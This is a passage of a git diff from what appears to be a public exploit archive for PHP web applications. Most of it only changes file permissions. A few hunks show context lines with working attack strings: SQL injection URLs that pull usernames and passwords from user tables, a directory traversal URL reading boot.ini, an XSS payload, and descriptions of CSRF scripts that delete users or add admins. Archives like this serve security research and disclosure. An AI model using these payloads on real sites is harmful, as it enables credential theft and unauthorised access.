mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11325.txt b/platforms/php/webapps/11325.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11326.txt b/platforms/php/webapps/11326.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11327.txt b/platforms/php/webapps/11327.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11329.txt b/platforms/php/webapps/11329.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1133.pm b/platforms/php/webapps/1133.pm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11334.txt b/platforms/php/webapps/11334.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11336.txt b/platforms/php/webapps/11336.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11337.txt b/platforms/php/webapps/11337.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11339.txt b/platforms/php/webapps/11339.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11340.txt b/platforms/php/webapps/11340.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11341.txt b/platforms/php/webapps/11341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11344.txt b/platforms/php/webapps/11344.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11345.txt b/platforms/php/webapps/11345.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11346.txt b/platforms/php/webapps/11346.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11349.txt b/platforms/php/webapps/11349.txt old mode 100755 new mode 100644 index b465c9c7b..d36e36214 --- a/platforms/php/webapps/11349.txt +++ b/platforms/php/webapps/11349.txt @@ -21,5 +21,4 @@ Demo: http:/server/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,password,username,6+from+exponent_user-- -#################################################################### - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/1135.c b/platforms/php/webapps/1135.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11350.txt b/platforms/php/webapps/11350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11352.txt b/platforms/php/webapps/11352.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11353.txt b/platforms/php/webapps/11353.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11354.txt b/platforms/php/webapps/11354.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11355.txt b/platforms/php/webapps/11355.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11356.txt b/platforms/php/webapps/11356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11357.txt b/platforms/php/webapps/11357.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11358.txt b/platforms/php/webapps/11358.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11359.txt b/platforms/php/webapps/11359.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11360.txt b/platforms/php/webapps/11360.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11365.txt b/platforms/php/webapps/11365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11366.txt b/platforms/php/webapps/11366.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11367.txt b/platforms/php/webapps/11367.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11368.txt b/platforms/php/webapps/11368.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11375.txt b/platforms/php/webapps/11375.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11376.txt b/platforms/php/webapps/11376.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11377.txt b/platforms/php/webapps/11377.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11378.txt b/platforms/php/webapps/11378.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11380.txt b/platforms/php/webapps/11380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11382.txt b/platforms/php/webapps/11382.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11383.txt b/platforms/php/webapps/11383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11385.txt b/platforms/php/webapps/11385.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11394.txt b/platforms/php/webapps/11394.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11395.txt b/platforms/php/webapps/11395.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11396.txt b/platforms/php/webapps/11396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11398.txt b/platforms/php/webapps/11398.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11399.txt b/platforms/php/webapps/11399.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1140.php b/platforms/php/webapps/1140.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11401.txt b/platforms/php/webapps/11401.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11402.txt b/platforms/php/webapps/11402.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11410.txt b/platforms/php/webapps/11410.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11411.txt b/platforms/php/webapps/11411.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11412.txt b/platforms/php/webapps/11412.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11415.txt b/platforms/php/webapps/11415.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11416.txt b/platforms/php/webapps/11416.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1142.php b/platforms/php/webapps/1142.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11424.txt b/platforms/php/webapps/11424.txt old mode 100755 new mode 100644 index 5d9495581..1ff1f077d --- a/platforms/php/webapps/11424.txt +++ b/platforms/php/webapps/11424.txt @@ -41,4 +41,4 @@ # POC:-http://server/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39 # # -################################################################ \ No newline at end of file +################################################################ \ No newline at end of file diff --git a/platforms/php/webapps/11425.txt b/platforms/php/webapps/11425.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11429.txt b/platforms/php/webapps/11429.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11430.txt b/platforms/php/webapps/11430.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11431.txt b/platforms/php/webapps/11431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11434.txt b/platforms/php/webapps/11434.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11436.txt b/platforms/php/webapps/11436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11437.txt b/platforms/php/webapps/11437.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11440.txt b/platforms/php/webapps/11440.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11441.txt b/platforms/php/webapps/11441.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11442.txt b/platforms/php/webapps/11442.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11443.txt b/platforms/php/webapps/11443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11444.txt b/platforms/php/webapps/11444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11445.txt b/platforms/php/webapps/11445.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11446.txt b/platforms/php/webapps/11446.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11447.txt b/platforms/php/webapps/11447.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11449.txt b/platforms/php/webapps/11449.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1145.pm b/platforms/php/webapps/1145.pm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11450.txt b/platforms/php/webapps/11450.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11452.txt b/platforms/php/webapps/11452.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11455.txt b/platforms/php/webapps/11455.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11456.txt b/platforms/php/webapps/11456.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11458.txt b/platforms/php/webapps/11458.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11460.txt b/platforms/php/webapps/11460.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11461.txt b/platforms/php/webapps/11461.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11462.txt b/platforms/php/webapps/11462.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11463.txt b/platforms/php/webapps/11463.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11464.txt b/platforms/php/webapps/11464.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11466.txt b/platforms/php/webapps/11466.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11473.txt b/platforms/php/webapps/11473.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11474.txt b/platforms/php/webapps/11474.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11476.txt b/platforms/php/webapps/11476.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11477.txt b/platforms/php/webapps/11477.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11478.txt b/platforms/php/webapps/11478.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11479.txt b/platforms/php/webapps/11479.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11480.txt b/platforms/php/webapps/11480.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11481.txt b/platforms/php/webapps/11481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11482.txt b/platforms/php/webapps/11482.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11483.txt b/platforms/php/webapps/11483.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11484.txt b/platforms/php/webapps/11484.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11485.txt b/platforms/php/webapps/11485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11486.txt b/platforms/php/webapps/11486.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11487.txt b/platforms/php/webapps/11487.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11488.txt b/platforms/php/webapps/11488.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11489.txt b/platforms/php/webapps/11489.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11490.txt b/platforms/php/webapps/11490.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11494.txt b/platforms/php/webapps/11494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11495.txt b/platforms/php/webapps/11495.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11496.txt b/platforms/php/webapps/11496.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11498.txt b/platforms/php/webapps/11498.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11502.txt b/platforms/php/webapps/11502.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11503.txt b/platforms/php/webapps/11503.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11504.txt b/platforms/php/webapps/11504.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11507.txt b/platforms/php/webapps/11507.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11508.txt b/platforms/php/webapps/11508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11509.txt b/platforms/php/webapps/11509.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11511.txt b/platforms/php/webapps/11511.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11515.txt b/platforms/php/webapps/11515.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11516.html b/platforms/php/webapps/11516.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11517.txt b/platforms/php/webapps/11517.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11518.txt b/platforms/php/webapps/11518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11519.txt b/platforms/php/webapps/11519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11521.txt b/platforms/php/webapps/11521.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11522.txt b/platforms/php/webapps/11522.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11523.txt b/platforms/php/webapps/11523.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11524.txt b/platforms/php/webapps/11524.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11526.txt b/platforms/php/webapps/11526.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11528.txt b/platforms/php/webapps/11528.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11530.txt b/platforms/php/webapps/11530.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11543.txt b/platforms/php/webapps/11543.txt old mode 100755 new mode 100644 index 0d20bb970..bb021a1f0 --- a/platforms/php/webapps/11543.txt +++ b/platforms/php/webapps/11543.txt @@ -46,4 +46,4 @@ Script to delete the registered user through Cross Site request forgery After execution refresh teh page and u can see that user having id=20 get deleted automatically. -#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file +#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/platforms/php/webapps/11544.php b/platforms/php/webapps/11544.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11547.txt b/platforms/php/webapps/11547.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11548.txt b/platforms/php/webapps/11548.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11550.txt b/platforms/php/webapps/11550.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11551.txt b/platforms/php/webapps/11551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11553.txt b/platforms/php/webapps/11553.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11554.txt b/platforms/php/webapps/11554.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11557.txt b/platforms/php/webapps/11557.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11558.txt b/platforms/php/webapps/11558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11559.txt b/platforms/php/webapps/11559.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11560.txt b/platforms/php/webapps/11560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11563.txt b/platforms/php/webapps/11563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11564.txt b/platforms/php/webapps/11564.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11565.txt b/platforms/php/webapps/11565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11568.txt b/platforms/php/webapps/11568.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11569.txt b/platforms/php/webapps/11569.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11570.txt b/platforms/php/webapps/11570.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11571.txt b/platforms/php/webapps/11571.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11575.txt b/platforms/php/webapps/11575.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11576.txt b/platforms/php/webapps/11576.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11577.txt b/platforms/php/webapps/11577.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11578.php b/platforms/php/webapps/11578.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11579.txt b/platforms/php/webapps/11579.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11582.txt b/platforms/php/webapps/11582.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11584.txt b/platforms/php/webapps/11584.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11585.txt b/platforms/php/webapps/11585.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11586.txt b/platforms/php/webapps/11586.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11587.txt b/platforms/php/webapps/11587.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11588.txt b/platforms/php/webapps/11588.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11592.txt b/platforms/php/webapps/11592.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11593.txt b/platforms/php/webapps/11593.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11595.php b/platforms/php/webapps/11595.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11596.txt b/platforms/php/webapps/11596.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11599.txt b/platforms/php/webapps/11599.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11600.txt b/platforms/php/webapps/11600.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11602.txt b/platforms/php/webapps/11602.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11603.txt b/platforms/php/webapps/11603.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11604.php b/platforms/php/webapps/11604.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11605.txt b/platforms/php/webapps/11605.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11609.txt b/platforms/php/webapps/11609.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11610.txt b/platforms/php/webapps/11610.txt old mode 100755 new mode 100644 index d6e211c5d..a5a2b1b36 --- a/platforms/php/webapps/11610.txt +++ b/platforms/php/webapps/11610.txt @@ -32,5 +32,4 @@ http://server/catalog/good.php?good_id=1/**/union/**/all/**/select/**/1,2,3,4,5, http://server/catalog/good.php?good_id= -http://server/catalog/good.php?good_id=164<script>alert("XSS")</script> - \ No newline at end of file +http://server/catalog/good.php?good_id=164<script>alert("XSS")</script> \ No newline at end of file diff --git a/platforms/php/webapps/11612.txt b/platforms/php/webapps/11612.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11613.txt b/platforms/php/webapps/11613.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11614.txt b/platforms/php/webapps/11614.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11616.txt b/platforms/php/webapps/11616.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11619.txt b/platforms/php/webapps/11619.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11620.txt b/platforms/php/webapps/11620.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11621.txt b/platforms/php/webapps/11621.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11623.txt b/platforms/php/webapps/11623.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11625.txt b/platforms/php/webapps/11625.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11627.txt b/platforms/php/webapps/11627.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11631.txt b/platforms/php/webapps/11631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11636.php b/platforms/php/webapps/11636.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11637.txt b/platforms/php/webapps/11637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11638.txt b/platforms/php/webapps/11638.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11641.txt b/platforms/php/webapps/11641.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11643.txt b/platforms/php/webapps/11643.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11648.txt b/platforms/php/webapps/11648.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11654.txt b/platforms/php/webapps/11654.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11655.txt b/platforms/php/webapps/11655.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11657.txt b/platforms/php/webapps/11657.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11660.txt b/platforms/php/webapps/11660.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11666.txt b/platforms/php/webapps/11666.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11667.txt b/platforms/php/webapps/11667.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11671.txt b/platforms/php/webapps/11671.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11672.txt b/platforms/php/webapps/11672.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11674.txt b/platforms/php/webapps/11674.txt old mode 100755 new mode 100644 index 2416b0224..9795bdfcf --- a/platforms/php/webapps/11674.txt +++ b/platforms/php/webapps/11674.txt @@ -25,6 +25,4 @@ [+] Exploitable - http://[host]/[path]/[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser-- - - \ No newline at end of file + http://[host]/[path]/[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser-- \ No newline at end of file diff --git a/platforms/php/webapps/11676.txt b/platforms/php/webapps/11676.txt old mode 100755 new mode 100644 index 7a2b25eff..561719148 --- a/platforms/php/webapps/11676.txt +++ b/platforms/php/webapps/11676.txt @@ -53,6 +53,4 @@ After execution refresh the page and u can see that user having giving ID get deleted automatically. -#If you have any questions, comments, or concerns, feel free to contact me. - - \ No newline at end of file +#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/platforms/php/webapps/11678.txt b/platforms/php/webapps/11678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11679.txt b/platforms/php/webapps/11679.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11680.txt b/platforms/php/webapps/11680.txt old mode 100755 new mode 100644 index 073dc123d..4691b02c9 --- a/platforms/php/webapps/11680.txt +++ b/platforms/php/webapps/11680.txt @@ -79,5 +79,4 @@ After execution refresh the page and u can see that user having giving name Added automatically with Admin Privilege. -#If you have any questions, comments, or concerns, feel free to contact me. - \ No newline at end of file +#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/platforms/php/webapps/11681.txt b/platforms/php/webapps/11681.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11684.txt b/platforms/php/webapps/11684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11685.txt b/platforms/php/webapps/11685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11686.txt b/platforms/php/webapps/11686.txt old mode 100755 new mode 100644 index 03dfcdbe8..2594d5574 --- a/platforms/php/webapps/11686.txt +++ b/platforms/php/webapps/11686.txt @@ -68,5 +68,4 @@ After execution refresh the page and u can see that a new link with teh given name is Added automatically. - #If you have any questions, comments, or concerns, feel free to contact me. - \ No newline at end of file + #If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/platforms/php/webapps/11687.txt b/platforms/php/webapps/11687.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11688.txt b/platforms/php/webapps/11688.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11689.txt b/platforms/php/webapps/11689.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11691.txt b/platforms/php/webapps/11691.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11692.txt b/platforms/php/webapps/11692.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11693.txt b/platforms/php/webapps/11693.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11695.txt b/platforms/php/webapps/11695.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11696.txt b/platforms/php/webapps/11696.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11698.txt b/platforms/php/webapps/11698.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11699.txt b/platforms/php/webapps/11699.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11701.txt b/platforms/php/webapps/11701.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11704.txt b/platforms/php/webapps/11704.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11707.txt b/platforms/php/webapps/11707.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11708.txt b/platforms/php/webapps/11708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11709.txt b/platforms/php/webapps/11709.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11710.php b/platforms/php/webapps/11710.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11711.txt b/platforms/php/webapps/11711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11715.txt b/platforms/php/webapps/11715.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11718.txt b/platforms/php/webapps/11718.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11719.txt b/platforms/php/webapps/11719.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11721.txt b/platforms/php/webapps/11721.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11722.txt b/platforms/php/webapps/11722.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11725.txt b/platforms/php/webapps/11725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11726.txt b/platforms/php/webapps/11726.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11727.txt b/platforms/php/webapps/11727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11729.txt b/platforms/php/webapps/11729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11730.txt b/platforms/php/webapps/11730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11731.html b/platforms/php/webapps/11731.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11732.txt b/platforms/php/webapps/11732.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11733.txt b/platforms/php/webapps/11733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11735.php b/platforms/php/webapps/11735.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11737.txt b/platforms/php/webapps/11737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11738.txt b/platforms/php/webapps/11738.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11739.txt b/platforms/php/webapps/11739.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11740.txt b/platforms/php/webapps/11740.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11741.txt b/platforms/php/webapps/11741.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11743.txt b/platforms/php/webapps/11743.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11744.txt b/platforms/php/webapps/11744.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11745.txt b/platforms/php/webapps/11745.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11746.txt b/platforms/php/webapps/11746.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11747.txt b/platforms/php/webapps/11747.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11748.txt b/platforms/php/webapps/11748.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11749.txt b/platforms/php/webapps/11749.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11752.txt b/platforms/php/webapps/11752.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11754.txt b/platforms/php/webapps/11754.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11755.txt b/platforms/php/webapps/11755.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11756.txt b/platforms/php/webapps/11756.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11757.txt b/platforms/php/webapps/11757.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11758.txt b/platforms/php/webapps/11758.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11759.txt b/platforms/php/webapps/11759.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11760.txt b/platforms/php/webapps/11760.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11761.txt b/platforms/php/webapps/11761.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11766.txt b/platforms/php/webapps/11766.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11767.txt b/platforms/php/webapps/11767.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11768.txt b/platforms/php/webapps/11768.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11771.txt b/platforms/php/webapps/11771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11772.txt b/platforms/php/webapps/11772.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11773.txt b/platforms/php/webapps/11773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11774.txt b/platforms/php/webapps/11774.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11775.txt b/platforms/php/webapps/11775.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11776.txt b/platforms/php/webapps/11776.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11777.txt b/platforms/php/webapps/11777.txt old mode 100755 new mode 100644 diff --git 